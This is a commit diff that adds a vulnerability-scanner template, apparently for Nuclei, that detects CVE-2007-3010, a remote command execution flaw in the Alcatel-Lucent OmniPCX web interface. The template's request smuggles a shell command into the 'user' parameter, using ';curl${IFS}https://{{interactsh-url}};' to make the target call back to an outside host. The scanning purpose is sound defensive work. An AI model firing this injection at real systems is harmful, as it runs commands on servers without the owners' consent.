Create template for CVE-2007-3010

Author: king-alexander

http/cves/2007/CVE-2007-3010.yaml

@@ -0,0 +1,28 @@
+id: CVE-2007-3010
+
+info:
+  name: Alcatel-Lucent OmniPCX - Remote Command Execution
+  author: king-alexander
+  severity: high 
+  description: |
+    The OmniPCX web interface has a script "masterCGI" with a remote command execution vulnerability via the "user" parameter.
+  impact: |
+   Any user with access to the web interface could execute arbitrary commands with the permissions of the webservers. 
+  remediation: |
+    Update to supported versions that filter shell metacharacters in the "user" parameter.
+  reference:
+    - https://nvd.nist.gov/vuln/detail/CVE-2007-3010
+    - https://marc.info/?l=full-disclosure&m=119002152126755&w=2
+  tags: alcatel,cve,cve2007,kev,rce
+
+http:
+  - method: GET
+    path: 
+      # Spaces must be encoded with the internal field separator "${IFS}" to execute the command. 
+      - "{{BaseURL}}/cgi-bin/masterCGI?ping=nomip&user=;curl${IFS}https://{{interactsh-url}};"
+        
+    matchers:
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "http"